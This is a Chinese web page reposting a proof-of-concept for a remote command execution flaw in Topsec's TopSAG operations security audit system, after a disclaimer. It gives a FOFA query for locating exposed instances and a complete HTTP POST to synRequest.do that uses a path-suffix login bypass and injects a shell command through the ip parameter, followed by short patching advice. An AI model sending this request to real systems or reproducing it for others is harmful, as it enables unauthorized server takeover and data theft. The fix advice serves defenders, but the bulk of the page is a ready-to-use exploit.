当前位置: 首页 > news >正文

【漏洞复现】天融信 运维安全审计系统 synRequest.do 远程命令执行漏洞

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。
        如有侵权,请联系删除。
        如有侵权,请联系删除。
        如有侵权,请联系删除。

产品简介

        天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成,系统以4A管理理念为基础、安全代理为核心,在运维管理领域持续创新,为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案,适用于政府、金融、能源、电信、交通、教育等行业。

漏洞描述

        天融信 运维安全审计系统 synRequest.do 存在命令执行漏洞,攻击者可以通过这个漏洞在服务器上执行任意命令,完全控制权,进行非法操作、窃取和篡改敏感数据,甚至完全接管服务器,给系统的安全性带来严重威胁。

网络空间测绘

Fofa

header="iam" && server="Apache-Coyote/"

漏洞复现

POST /iam/synRequest.do;.login.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)
Content-Length: 46
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Accept-Encoding: gzip, deflate, br
Connection: keep-alivemethod=trace_route&w=1&ip=127.0.0.1|id%3b&m=10

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。

2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。

3、及时升级产品到最新版本。


http://www.mrgr.cn/news/37226.html

相关文章:

  • 问:聊聊JAVA中的共享锁和独占锁?
  • 【HarmonyOS】鸿蒙仿iOS线性渐变实现
  • 程序员如何提升核心竞争力以应对技术变革与挑战
  • 实战OpenCV之色彩空间转换
  • LabVIEW提高开发效率技巧----并行处理
  • 使用PyTorch进行自然语言处理:实现一个文本分类函数
  • Redis实战--Redis应用过程中出现的热门问题及其解决方案
  • XSS | DOM 型 XSS 攻击
  • MySQL基础知识(三)
  • 定时任务上云改造方案
  • HI3521DV200 22AP10/SS524V100 芯片及开发板
  • GNU链接器(LD):PHDRS 命令用法及实例详解
  • 解决图片放大模糊
  • 多线程计算π
  • C语言 | Leetcode C语言题解之第440题字典序的第K小数字
  • LM393 电压比较器和典型电路
  • DSP——从入门到放弃系列——多核导航器(持续更新)
  • C++中的动态图形与音频同步:实现罗盘时钟与音乐播放器
  • Flask 本地测试完成,如何部署到网络上,买什么样的空间
  • HarmonyOS异常处理实践